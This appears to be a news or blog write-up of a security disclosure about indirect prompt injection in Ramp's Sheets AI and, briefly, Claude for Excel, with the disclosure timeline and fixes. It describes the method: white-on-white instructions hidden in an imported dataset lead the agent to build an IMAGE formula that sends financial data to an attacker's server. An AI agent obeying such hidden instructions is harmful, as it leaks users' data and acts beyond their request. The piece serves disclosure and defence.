Security researchers at PromptArmor found a nasty vulnerability in Ramp's Sheets AI that could silently leak your financial data to an attacker's server. The attack works through indirect prompt injection: someone hides malicious instructions in an external dataset using white-on-white text, you import that dataset to compare against your internal financials, and Ramp's AI follows the hidden commands instead of your actual request. It builds an IMAGE formula with your sensitive data embedded in the URL, inserts it into your spreadsheet, and your data gets sent to the attacker. All without asking you for permission.

It's disturbingly simple. The agent edits spreadsheets with no human-in-the-loop check. No approval step, no "are you sure?" dialog. Just an AI reading cell contents as instructions and acting on them. PromptArmor found nearly the same flaw in Anthropic's Claude for Excel, where malicious formulas could trigger data exfiltration even though that product technically had human review built in. Anthropic fixed it by adding a red warning interstitial that displays the full formula before insertion.

Ramp's case took longer to resolve. PromptArmor disclosed the vulnerability on February 19, 2026. They followed up twice before Ramp confirmed receipt on March 14, citing a transition between disclosure programs that caused the delay. Two days later, on March 16, Ramp confirmed the issue was fixed.

Ramp isn't the real issue here. Agentic spreadsheets from Microsoft, Google, and others all share this same architectural flaw. LLMs ingest cell contents as prompt context, blurring the line between data and executable instructions. Researchers have shown that models from OpenAI and Anthropic can be tricked into generating malicious IMAGE or IMPORT formulas that bypass standard filters. We're essentially reliving the macro virus era of the 1990s, but now the attacks come wrapped in natural language that AI agents happily interpret and execute.